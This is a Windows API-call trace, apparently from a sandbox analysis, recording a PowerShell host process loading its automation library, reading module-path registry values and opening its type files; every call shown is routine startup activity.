	[0276.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0276.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0277.553] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0277.553] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0277.553] CoTaskMemFree (pv=0x389720) 
	[0277.555] CoTaskMemAlloc (cb=0xcc) returned 0x372c20
	[0277.555] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x372c20, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0277.555] CoTaskMemFree (pv=0x372c20) 
	[0277.555] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d8e8 | out: phkResult=0x12d8e8*=0x1cc) returned 0x0
	[0277.556] RegQueryValueExW (in: hKey=0x1cc, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d86c, lpData=0x0, lpcbData=0x12d868*=0x0 | out: lpType=0x12d86c*=0x2, lpData=0x0, lpcbData=0x12d868*=0x6c) returned 0x0
	[0277.556] CoTaskMemAlloc (cb=0x70) returned 0x31a330
	[0277.556] RegQueryValueExW (in: hKey=0x1cc, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d83c, lpData=0x31a330, lpcbData=0x12d838*=0x6c | out: lpType=0x12d83c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x12d838*=0x6c) returned 0x0
	[0277.556] CoTaskMemFree (pv=0x31a330) 
	[0277.556] CoTaskMemAlloc (cb=0xcc) returned 0x372c20
	[0277.556] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x372c20, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0277.556] CoTaskMemFree (pv=0x372c20) 
	[0277.556] CoTaskMemAlloc (cb=0xcc) returned 0x372c20
	[0277.556] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x372c20, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0277.556] CoTaskMemFree (pv=0x372c20) 
	[0277.957] RegCloseKey (hKey=0x1cc) returned 0x0
	[0277.957] CoTaskMemAlloc (cb=0xcc) returned 0x372c20
	[0277.957] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x372c20, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0277.957] CoTaskMemFree (pv=0x372c20) 
	[0277.958] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d8e8 | out: phkResult=0x12d8e8*=0x1cc) returned 0x0
	[0277.958] RegQueryValueExW (in: hKey=0x1cc, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d86c, lpData=0x0, lpcbData=0x12d868*=0x0 | out: lpType=0x12d86c*=0x0, lpData=0x0, lpcbData=0x12d868*=0x0) returned 0x2
	[0277.958] RegCloseKey (hKey=0x1cc) returned 0x0
	[0277.962] CoTaskMemAlloc (cb=0x20c) returned 0x3641d0
	[0277.962] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3641d0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0277.964] CoTaskMemFree (pv=0x3641d0) 
	[0277.964] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d470, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0277.965] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0277.970] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0277.970] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0277.970] CoTaskMemFree (pv=0x389720) 
	[0277.972] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0277.972] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0277.972] CoTaskMemFree (pv=0x389720) 
	[0277.978] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0277.978] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0277.978] CoTaskMemFree (pv=0x389720) 
	[0277.978] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0277.978] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0277.978] CoTaskMemFree (pv=0x389720) 
	[0277.980] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6d8 | out: phkResult=0x12d6d8*=0x1d0) returned 0x0
	[0277.980] RegQueryValueExW (in: hKey=0x1d0, lpValueName="path", lpReserved=0x0, lpType=0x12d6ec, lpData=0x0, lpcbData=0x12d6e8*=0x0 | out: lpType=0x12d6ec*=0x1, lpData=0x0, lpcbData=0x12d6e8*=0x74) returned 0x0
	[0277.981] RegQueryValueExW (in: hKey=0x1d0, lpValueName="path", lpReserved=0x0, lpType=0x12d65c, lpData=0x0, lpcbData=0x12d658*=0x0 | out: lpType=0x12d65c*=0x1, lpData=0x0, lpcbData=0x12d658*=0x74) returned 0x0
	[0277.981] CoTaskMemAlloc (cb=0x78) returned 0x31a330
	[0277.981] RegQueryValueExW (in: hKey=0x1d0, lpValueName="path", lpReserved=0x0, lpType=0x12d62c, lpData=0x31a330, lpcbData=0x12d628*=0x74 | out: lpType=0x12d62c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x12d628*=0x74) returned 0x0
	[0277.981] CoTaskMemFree (pv=0x31a330) 
	[0277.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x12d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0277.981] SetErrorMode (uMode=0x1) returned 0x1
	[0277.981] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x12d5b0 | out: lpFileInformation=0x12d5b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0277.982] SetErrorMode (uMode=0x1) returned 0x1
	[0277.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0277.983] SetErrorMode (uMode=0x1) returned 0x1
	[0277.983] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d5b0 | out: lpFileInformation=0x12d5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0277.983] SetErrorMode (uMode=0x1) returned 0x1
	[0277.985] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0277.985] SetErrorMode (uMode=0x1) returned 0x1
	[0277.985] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d5b0 | out: lpFileInformation=0x12d5b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0277.985] SetErrorMode (uMode=0x1) returned 0x1
	[0277.986] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0277.986] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0277.986] CoTaskMemFree (pv=0x389720) 
	[0277.987] CoTaskMemAlloc (cb=0x104) returned 0x389720
	[0277.987] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389720, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0277.987] CoTaskMemFree (pv=0x389720) 
	[0277.988] GetACP () returned 0x4e4
	[0277.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0277.994] SetErrorMode (uMode=0x1) returned 0x1
	[0277.994] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0277.995] GetFileType (hFile=0x328) returned 0x1
	[0277.995] SetErrorMode (uMode=0x1) returned 0x1
	[0277.995] GetFileType (hFile=0x328) returned 0x1
	[0277.996] ReadFile (in: hFile=0x328, lpBuffer=0x2dea6f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2dea6f8*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.358] ReadFile (in: hFile=0x328, lpBuffer=0x2dea6f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2dea6f8*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.359] ReadFile (in: hFile=0x328, lpBuffer=0x2dea6f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2dea6f8*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.359] ReadFile (in: hFile=0x328, lpBuffer=0x2dea6f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2dea6f8*, lpNumberOfBytesRead=0x12d4e8*=0xcf3, lpOverlapped=0x0) returned 1
	[0278.359] ReadFile (in: hFile=0x328, lpBuffer=0x2de9b53, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2de9b53*, lpNumberOfBytesRead=0x12d4e8*=0x0, lpOverlapped=0x0) returned 1
	[0278.360] ReadFile (in: hFile=0x328, lpBuffer=0x2dea6f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2dea6f8*, lpNumberOfBytesRead=0x12d4e8*=0x0, lpOverlapped=0x0) returned 1
	[0278.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0278.362] SetErrorMode (uMode=0x1) returned 0x1
	[0278.362] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d460 | out: lpFileInformation=0x12d460*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0278.363] SetErrorMode (uMode=0x1) returned 0x1
	[0278.363] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0278.364] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d548 | out: phkResult=0x12d548*=0x328) returned 0x0
	[0278.364] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d4cc, lpData=0x0, lpcbData=0x12d4c8*=0x0 | out: lpType=0x12d4cc*=0x1, lpData=0x0, lpcbData=0x12d4c8*=0x56) returned 0x0
	[0278.364] CoTaskMemAlloc (cb=0x5a) returned 0x37f580
	[0278.364] RegQueryValueExW (in: hKey=0x328, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d49c, lpData=0x37f580, lpcbData=0x12d498*=0x56 | out: lpType=0x12d49c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d498*=0x56) returned 0x0
	[0278.364] CoTaskMemFree (pv=0x37f580) 
	[0278.364] RegCloseKey (hKey=0x328) returned 0x0
	[0278.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0278.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0278.378] GetSystemInfo (in: lpSystemInfo=0x12c180 | out: lpSystemInfo=0x12c180*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0278.378] VirtualQuery (in: lpAddress=0x12c230, lpBuffer=0x12d0f0, dwLength=0x30 | out: lpBuffer=0x12d0f0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0278.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0278.394] SetErrorMode (uMode=0x1) returned 0x1
	[0278.394] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328
	[0278.394] GetFileType (hFile=0x328) returned 0x1
	[0278.394] SetErrorMode (uMode=0x1) returned 0x1
	[0278.394] GetFileType (hFile=0x328) returned 0x1
	[0278.789] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.790] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.790] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.790] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.791] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.791] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.791] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.791] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.791] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.792] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.792] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.792] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.793] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.793] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.793] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
	[0278.793] ReadFile (in: hFile=0x328, lpBuffer=0x2cb5808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d4e8, lpOverlapped=0x0 | out: lpBuffer=0x2cb5808*, lpNumberOfBytesRead=0x12d4e8*=0x1000, lpOverlapped=0x0) returned 1
